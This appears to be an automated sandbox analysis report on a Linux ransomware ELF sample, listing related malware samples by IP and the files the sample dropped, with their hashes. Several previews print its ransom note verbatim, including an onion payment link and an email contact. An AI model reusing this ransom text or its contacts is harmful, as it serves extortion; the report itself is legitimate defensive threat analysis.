                                main_mips.elfGet hashmaliciousMiraiBrowse
                                • 91.189.91.42
                                main_arm.elfGet hashmaliciousMiraiBrowse
                                • 91.189.91.42
                                i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 91.189.91.42
                                x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 91.189.91.42
                                armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 91.189.91.42
                                INIT7CHmain_m68k.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                main_sh4.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                tftp.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                Mozi.mGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                main_arm6.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                main_mips.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                main_arm.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 109.202.202.202
                                x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 109.202.202.202
                                armv4l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                • 109.202.202.202
                                BITWEB-ASRUhttps://caraccidentdefencelawyer.com/LBKQgs7C#3l3f816z5y810bbd3w5muypm6py7liz04w39Get hashmaliciousGRQ ScamBrowse
                                • 193.143.1.195
                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                IWnUKXop2x.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                LNLAncf2v5.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                h3G4uG7Kqi.elfGet hashmaliciousMiraiBrowse
                                • 45.133.217.107
                                4Y8rbNhkaR.elfGet hashmaliciousMirai, OkiruBrowse
                                • 193.143.1.59
                                CLOUDFLARENETUSQuote_General_Tech_LLC_637673,PDF.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                • 104.21.5.155
                                e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                • 188.114.96.3
                                jCN22OTVxq.lnkGet hashmaliciousUnknownBrowse
                                • 104.21.73.244
                                Cxn80OsiM7.lnkGet hashmaliciousUnknownBrowse
                                • 104.21.73.244
                                r96vfq6E6O.lnkGet hashmaliciousUnknownBrowse
                                • 172.67.193.120
                                MvUoLtpUWG.lnkGet hashmaliciousUnknownBrowse
                                • 172.67.193.120
                                IFeOeQQTXe.lnkGet hashmaliciousUnknownBrowse
                                • 172.67.193.120
                                JyQcnZpmqD.lnkGet hashmaliciousUnknownBrowse
                                • 104.21.73.244
                                LPIJdxU8Sf.lnkGet hashmaliciousUnknownBrowse
                                • 172.67.193.120

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink

                                Download File
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):10
                                Entropy (8bit):2.9219280948873623
                                Encrypted:false
                                SSDEEP:3:5bkPn:pkP
                                MD5:FF001A15CE15CF062A3704CEA2991B5F
                                SHA1:B06F6855F376C3245B82212AC73ADED55DFE5DEF
                                SHA-256:C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
                                SHA-512:65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:auto_null.

                                /home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source

                                Download File
                                Process:/usr/bin/pulseaudio
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):18
                                Entropy (8bit):3.4613201402110088
                                Encrypted:false
                                SSDEEP:3:5bkrIZsXvn:pkckv
                                MD5:28FE6435F34B3367707BB1C5D5F6B430
                                SHA1:EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
                                SHA-256:721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
                                SHA-512:6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:auto_null.monitor.

                                /proc/6413/oom_score_adj

                                Download File
                                Process:/usr/bin/dbus-daemon
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:V:V
                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:0

                                /run/acpid.pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.730391958884377
                                Encrypted:false
                                SSDEEP:3:1r3ll/lsl5llb2FTspRKg9tP3d9jKqkzlazrT31zAn:1eGIpRR9j92qkcj31E
                                MD5:1AD272920CB8C3E6AFFF3B4F1F96A131
                                SHA1:59B99637A79A29535AD30E30C1D97F4EA07C3478
                                SHA-256:FB2BAC83ED7AE5B8626B2874F044A4AE33243BB7B743604027B1F3F06E92A50A
                                SHA-512:6A6238E8D2F07618A767BBE83A72E076FA9A42DF7845E182B852B3EB79EB21493F650FD3242DEB043022BA7F75E292BF981E389DCA4DE7D5509D4D91BA162457
                                Malicious:false
                                Reputation:low
                                Preview:.57..!2A........(............................1S=]7:.Tf..$8h..`\..%.a....c8.<I.OI.y..u].-.'.!.....w.$ ,...WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/avahi-daemon/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Reputation:low
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/avahi-daemon/pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.624071099478406
                                Encrypted:false
                                SSDEEP:3:Kkll3ll/lsl5ll8jf4WYTcT+Q/p4QbBgBgao/WKqkzlazrT31zAn:KnUvhd9gBgao/Fqkcj31E
                                MD5:2E3962C505E0A30814DAF97B8A5F1C42
                                SHA1:F4E4431E8D46E583CF21958682AD50E61EA64A53
                                SHA-256:CCE22D85E28C43486B020D144BE13C575A6641FA36A50ECB7FBA797909E34630
                                SHA-512:87B9EB3F9AA751A7ABE8B2CCE2A8867BCDF1C63D1661A5AC3E288234683CA8F5184A8484CDAC5444B44A18D8BB2EC9F2281F1B7A38BDE9D1BB774545C83B6180
                                Malicious:false
                                Reputation:low
                                Preview:.8...!2A........(...........................g..g*..\$j..}H.......V. ..[.*....g.>..R...u4..$Hz7s.kM..#..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/crond.pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.684033208915283
                                Encrypted:false
                                SSDEEP:3:wLXu/3ll/lsl5ll9/N0TLTWVJ6ANyOOhyvKqkzlazrT31zAn:wLX1TSKj6ANBdyqkcj31E
                                MD5:18673020488C57386446C9BDD67023E7
                                SHA1:E01C47A25C9661EFA2746A112447303EB7BB24B6
                                SHA-256:EFB42B5EB1A3F9F271D97CDFD00AFC9780F40B407057DA48FD764497F82749DC
                                SHA-512:59D8CFFD2CDA030CC5B2DC714288F0724BAA83C635E6316CBFAF91DFB80E22FA53E42D77517BD579BDB23094F5820E6B5306BD0BAA7B2CF3F5C50F45BAEA5303
                                Malicious:false
                                Preview:.p..!2A........(...............................C.L..(.0.....:....b..Q..W.K)....!...s..C..$q..7.2C..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/cups/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/cups/printcap

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):271
                                Entropy (8bit):6.771085965798113
                                Encrypted:false
                                SSDEEP:6:HywDtbcPe0LQmtJHzeVyf+G+ERbblEbeNsqkcj31E:HxDtbGJHSilpSTcO
                                MD5:6019CF7FA208436C5312C4863E732EC6
                                SHA1:89D9F09B7AC73A4A0E0573174282075EEB3C05D1
                                SHA-256:6A8854E1999F0F63945047B582CF89D7B4676DED5AD098B8B3F9F12E4D31C37E
                                SHA-512:91A414DF88CC486D062EED9374BA059884CE10A63BCACBCA3BF0AED3F7467012910FAE5C0451E1FFAE3E9CB857254A75FF88224E5F3298BAEDD263AD442149C6
                                Malicious:false
                                Preview:.....$.,f......%a.!){....a.ac...A9..b5..U.xw=..d..3.]....1.....V{/>..2lVU.\r..u.v..L.:..4)a.l..4....B......JN.j.CJ.K.....&.1.......!2A........(..............................C..+#..p.=N..<!.*o~......)]....D.Q......n7.+[.8../.......WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/gdm3.pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):141
                                Entropy (8bit):5.641537923739266
                                Encrypted:false
                                SSDEEP:3:AFn/3ll/lsloltaEhfjSManGJDicOhkhJKqkzlazrT31zAn:Ad647kxb/hvqkcj31E
                                MD5:B202C34CC3BDE8E10E4992BF00C7BA84
                                SHA1:715429D1F19B115F4C4A9BBC52CB1F8847B7496C
                                SHA-256:BDCAF10B8C87C08A1C48B66F5837A34B291401557051056C9A88C2483AA76D9B
                                SHA-512:C3E01B908BEC05D3DD1116C27385752239EFDEECA6566EFFC8CD4C9742893012B9BD816C3FC19D2648EFD1FD0C6FA8E6807BE4766EA991EB83C8196765238AC3
                                Malicious:false
                                Preview:..-{.!2A........(...............................J..|:....-,.2y...}MSd@..#/';..VLQ.-.n..........(....J..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/mono-xsp4.pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.764355441042688
                                Encrypted:false
                                SSDEEP:3:y00n/3ll/lsl5llkx/7jzD5yAAkYG98O/b0OhyRJKqkzlazrT31zAn:y00n6yvAkxuCbRkyqkcj31E
                                MD5:C8EEE84546EFE567FD16AEB97DBC6A58
                                SHA1:C6EF86C4E56A137B6CC8A6E8BCC2D1C86EAAB61F
                                SHA-256:0C2FEB057BD945BEAF8F392CAB6E1CD1488BECA280B1FE8EF2A152B520FD5DD6
                                SHA-512:96720206B4AB8C27A9DCAD28121758285F296B5DA52BD7E5111101EDC0F6A5773D0DF41703F106A090D7F4A0ECDBD954D9C5265C81B8370B245682AC837F1E4F
                                Malicious:false
                                Preview:.n"..!2A........(...........................e.|AP........$.G....."..W....#N-.d..... .}...C...*I.B."~...WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/motd.d/fwupd/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/snapd/ns/RECOVERY INFO.txt

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):441
                                Entropy (8bit):5.343714740955885
                                Encrypted:false
                                SSDEEP:12:0jnKWBy8G/Lvs4VbTRRaVgbekkwFB+w/e/sL:cKWwT/LvbTfSkkCX/e0L
                                MD5:0E5A36767CD4D47BB0BE917F5C6F3E76
                                SHA1:9477478AA8F0DBD589515672CCB98E092F4438F2
                                SHA-256:2DED4E7C7DF3FD48B9B4C526448D8C4BFE6926C851EF715EE0E4407A34E131B7
                                SHA-512:3803582CAB6258BF64C9A851D2AFA6D58A3EB267F8FF950FE06DD1DFAC1AD9F4968C5A99F3EB45D030C2339BEE28AF28637EC212B2ADA6CA70907B3DD751AB1C
                                Malicious:false
                                Preview:Your data has been encrypted..In order to return your files back you need decryption tool..1)Download TOR Browser .2)Open in TOR browser link below and contact with us there:.http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4.Or email: lazylazy@tuta.com..Limit for free decryption: 3 files up to 5mb (no database or backups)

                                /run/snapd/ns/snap.lxd.info

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):158
                                Entropy (8bit):5.88058898781548
                                Encrypted:false
                                SSDEEP:3:gR8e3Za3ll/lslrl6QJc3KVCtM0rIdiiGpdKqkzlazrT31zAn:gCejo7P7rIppqkcj31E
                                MD5:DE7F71DA11D0CF7FF62EC78DADBF6E92
                                SHA1:2D8673FA2A30DC9E33E62D71894A6730C811BB1E
                                SHA-256:71FE52F4DB7C8BF27233B1BADBEA7EE9D38FE18ABA7AF6F75BA31FF037A255E5
                                SHA-512:89CCB48C66334230433B5EDF9EC23FE3EBE8EB0DA640D25EEFDD8E2D825243351C2C7BD4BF37B94521D48F4C4C843A5651CE5C503AE909D2C5C32334EFC38070
                                Malicious:false
                                Preview:.(Zmd..T.p...P...X4.F.!2A........(...........................r.0..ab..k.!..CY"..6.....(B.]....?................4KY...l..WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/sshd.pid

                                Download File
                                Process:/tmp/Zc9eO57fgF.elf
                                File Type:data
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):5.7446776731700915
                                Encrypted:false
                                SSDEEP:3:hz/3ll/lsl5llMgN+/WD4IUtB8X/rtSl8jPAfKqkzlazrT31zAn:kNN+/LB8X/yiqkcj31E
                                MD5:1B6E868027D3A998A7769D67A3932114
                                SHA1:8D4F7BB7A0473957E6F2A9681FFA67BB52D6FACD
                                SHA-256:ABCD870C61FE9DDFD59CC641EDDE3ABB2DA4AEEEED3990D2F4725496EEEA396A
                                SHA-512:A73C40AF53929A2F4A75A8AB0DF8A4B204F04ED8977F1F2A737CCD299E4DFEE7D79D71D064254385DA5F57AF17D7EEC6FC584A08F3BB4409EBDF2829F6E64319
                                Malicious:false
                                Preview:.....!2A........(...........................4+.n'.hy..2Z;.D.@s..>..w..w2.....!HE.!Sl."y...7.c.b.......WRD...&..}{..?.X.#..6..../Q.D3$.

                                /run/systemd/inhibit/.#104Nhbtc

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):249
                                Entropy (8bit):5.1334532270294
                                Encrypted:false
                                SSDEEP:6:SbFuFyL8NEL1QXccIRI/cIlG/cI/0tmWvyPXaLX6zpp7Rl:qgFqXQXTI1IltIQvEy0Rl
                                MD5:AF66846AF74C40610BAFB25EE938E4A4
                                SHA1:FE0B6DDD55722B8EF394C736B3868CFF6744AADB
                                SHA-256:BD8502E132D917AEBA0DBEC8BC8A7577225E2292D5DFCA93E7BF8E9676749D7E
                                SHA-512:382125456440D04D4C16AEAF60066659FEFC4F14AF76A215901DD2AC13E1C24FB37F0C13BA9BD5CE7D32633544658FB855834084CC69576FEEEBF96BBB7D9EDD
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=handle-power-key:handle-suspend-key:handle-hibernate-key:handle-lid-switch.MODE=block.UID=1000.PID=2123.WHO=xfce4-power-manager.WHY=xfce4-power-manager handles these events.FIFO=/run/systemd/inhibit/10.ref.

                                /run/systemd/inhibit/.#1etcjRb

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):163
                                Entropy (8bit):4.963022897344031
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                                MD5:740A3D9E5BDC608745C17F00098F3B54
                                SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                                SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                                SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.

                                /run/systemd/inhibit/.#1yYk6la

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):163
                                Entropy (8bit):4.963022897344031
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifVmDkBoDWicRF2Tg+tX8/Sf9n:SbFuFyL8OAApfADjDJcjKR9n
                                MD5:740A3D9E5BDC608745C17F00098F3B54
                                SHA1:7560EFF166E352223840BEC1F56A81E2E750EAA4
                                SHA-256:2E4D26DB81D842D45D86636831C89D683C5E76402507208EE127B8BCFDF761A5
                                SHA-512:1B4A026AF214E8797A267CB75D1201E8B4A2C56C95C9A02EB928F77CF2ADB9FB196107163436B30801AE0AE15D67934224F58AB590F94E12ED962389C38AD675
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=847.WHO=ModemManager.WHY=ModemManager needs to reset devices.FIFO=/run/systemd/inhibit/1.ref.

                                /run/systemd/inhibit/.#336tpsa

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):204
                                Entropy (8bit):4.981193950793451
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWNQK4wq29ifx+q+zgCtkBFqG8QCfA/dcvWZ47tX8/SfWADv:SbFuFyL8KQKeLfUq6gckMQ22dKWZAlRT
                                MD5:A1C4614191983B812562258CC03B7BB1
                                SHA1:1B6B9CE5685DDE148191EB555E97315711649F50
                                SHA-256:7AFBD3A498991585285E7B73720083EAFC602DD1310D179FF8C3772F98E21134
                                SHA-512:A16EF07B928AFE1779BA2E154641039206ECA3F219DE48163D31BFC91FD4313DADAF771EE4269E3CC03B89C81C759A28310BD24D701E5B3DBF8036C226B4B325
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=shutdown.MODE=delay.UID=0.PID=884.WHO=Unattended Upgrades Shutdown.WHY=Stop ongoing upgrades or perform upgrades before shutdown.FIFO=/run/systemd/inhibit/3.ref.

                                /run/systemd/inhibit/.#4EmLAPa

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):143
                                Entropy (8bit):5.109910338925392
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9ifSU1IppTMXSHK72X8/SflY:SbFuFyL8OAApfZApLHK7wRS
                                MD5:E374D3E418E44E444D586B8A667BA7B9
                                SHA1:10E313EA3C86F242B0921AB80E794817F858DE3C
                                SHA-256:E3C381103F615FE4A0F85F9F07DBD40A4E8DB91EAA187D48472C7EEC6772C23C
                                SHA-512:42AD26F8C651EF390A526392C492526AA81919D09085D7DB9A6DE067AADEE06AA8E908638667AFAE1A79F2C632E430868E9D87D36BF45DE0E708BFE83993E991
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=0.PID=1599.WHO=UPower.WHY=Pause device polling.FIFO=/run/systemd/inhibit/4.ref.

                                /run/systemd/inhibit/.#5fKbbzb

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):198
                                Entropy (8bit):5.229502665506919
                                Encrypted:false
                                SSDEEP:6:SbFuFyL8NEL1QXccIRI/cIlGjdC+5rqKLXv0R5:qgFqXQXTI1Il0qKjcR5
                                MD5:65D49247D84F1F59B04E2D62ACBF37DF
                                SHA1:0769B6966C4C44D013DCD3ADD8297BBD3712BF05
                                SHA-256:3F5664EB8E0E6A758DE79C7731E3CEC1C794732476C842DD057932D67D3812D5
                                SHA-512:E1B4834B171FF12BD80BCD5261E3EEAABD61766CC6A3BFFD8195A0C87345601207257B0B1CF03388B494523AE1FA6BDFFB82EFE25E885A3E8BB5824A04F8702D
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=handle-power-key:handle-suspend-key:handle-hibernate-key.MODE=block.UID=127.PID=1648.WHO=gdm.WHY=GNOME handling keypresses.FIFO=/run/systemd/inhibit/5.ref.

                                /run/systemd/inhibit/.#6PPli7c

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):147
                                Entropy (8bit):5.1669277917692895
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9c+5ViXoqKZLXviX8/SfI:SbFuFyL8OAAx+5rqKLXv0RI
                                MD5:95B4BEB9E23C631D44BA23687078DEAB
                                SHA1:E8858CA80C412C790D383760A0CD031213EF30A2
                                SHA-256:3A02E7AD5FD819002373D84A62069BE9522E9F994400633DD477B4789C0616C0
                                SHA-512:BA3AB070840AD50CA3A630455B351ECE9CB2D89E6C32FA0C43BA869AF571AE8D63AE83AF95742A145DE89B095D1BC64BC0682995FDC56FE95A3BC3439DF2F732
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=127.PID=1648.WHO=gdm.WHY=GNOME handling keypresses.FIFO=/run/systemd/inhibit/6.ref.

                                /run/systemd/inhibit/.#7Kdz37c

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):152
                                Entropy (8bit):5.138883971711133
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9c+5lyiiXulpv5RX8/Sffn:SbFuFyL8OAAx+5lNlpLRfn
                                MD5:9921B6FC71927A90C0CEB5BCA4748393
                                SHA1:0376F45428203428F5E9C156A981044E2D66333C
                                SHA-256:EB6B7209CD410B6CC4E42E26224BEC45C9935357F5574FB2B8DCBDFB955BAFA6
                                SHA-512:279E8A47E3A3269CF04ABEA70CC4E92FCEBE56F1A9D1539C1D6BF9085F876A2C740C940DF5018E396C6CA463A71BE0B71DB90E0D699B4398E38FA72B55BE563C
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=127.PID=1668.WHO=gdm.WHY=GNOME needs to lock the screen.FIFO=/run/systemd/inhibit/7.ref.

                                /run/systemd/inhibit/.#8tNOlXc

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):164
                                Entropy (8bit):5.11427950700706
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMs/eWJAAVu9hFfy3GXA6wTgvWvVZX8/Sf+Dvn:SbFuFyL8OAAKfy3GXxVWNpR+z
                                MD5:A2809D1B173C22623712906FBB235B53
                                SHA1:8D1481F5BA5D1F7FC25FF2CD90B553A9D92DF84B
                                SHA-256:DF533496FEFF7669BA95EFA1AA09BCBEF7440FCA20042DA62231C1E6D5F2365D
                                SHA-512:8FBC45A480B6FB4FD3CDCD2D94209B551F3C0B7C8F94AC57F6B00FA9D156D3A7D6A586F213F613A3726EB227348EEC42B7D209274AB3D8111C1C4F7AD07370E6
                                Malicious:false
                                Preview:# This is private data. Do not parse..WHAT=sleep.MODE=delay.UID=1000.PID=2028.WHO=xfce4-screensaver.WHY=Locking screen before sleep.FIFO=/run/systemd/inhibit/8.ref.

                                /run/systemd/seats/.#seat04agMac

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):95
                                Entropy (8bit):4.921230646592726
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+v:SbFuFyLwH47Pg20ggWv
                                MD5:BE58CCABC942125F5E27AF6EB1BA2F88
                                SHA1:07C20F55E36EE48869B223B8FC4DBC227C7353AC
                                SHA-256:551B1D1C8E5953D5D0CF49C83C1568E2FBEF8BDDB69903B3DA82240B777B4629
                                SHA-512:E5A270995FDE80530927E0BACD3BF76EE820C968AABD55D2E34579326F388AFD6DE7FB8C5D54F69D3F6AC30A5B587FD3B0456FC60326E7DF4F45789A900D046C
                                Malicious:false
                                Preview:# This is private data. Do not parse..IS_SEAT0=1.CAN_MULTI_SESSION=1.CAN_TTY=1.CAN_GRAPHICAL=0.

                                /run/systemd/seats/.#seat0EmuCMc

                                Download File
                                Process:/lib/systemd/systemd-logind
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):116
                                Entropy (8bit):4.957035419463244
                                Encrypted:false
                                SSDEEP:3:SbFVVmFyinKMsuH47rLg205vmLUbr+ugKQ2KwshcXSv:SbFuFyLwH47Pg20ggWunQ2rNXc
                                MD5:66D114877B3B4DB3BDD8A3AD4F5E7421
                                SHA1:62E0CB0F51E0E3F97BE251CB917968DFF69ED344
                                SHA-256:A922628916A7DDBE2BAA33F421C82250527EA3C28E429749353A1C75C0C18860
                                SHA-512:5651247FA236DCF020A3C8456E4A9A74A85C5B9B3CCE94A3CF8F85FD4D66465C9F97DF7A1822E6CA4553C02BE149F3021D58DCC0C8CB6DCF37F915BD0A158187
                                Malicious:false
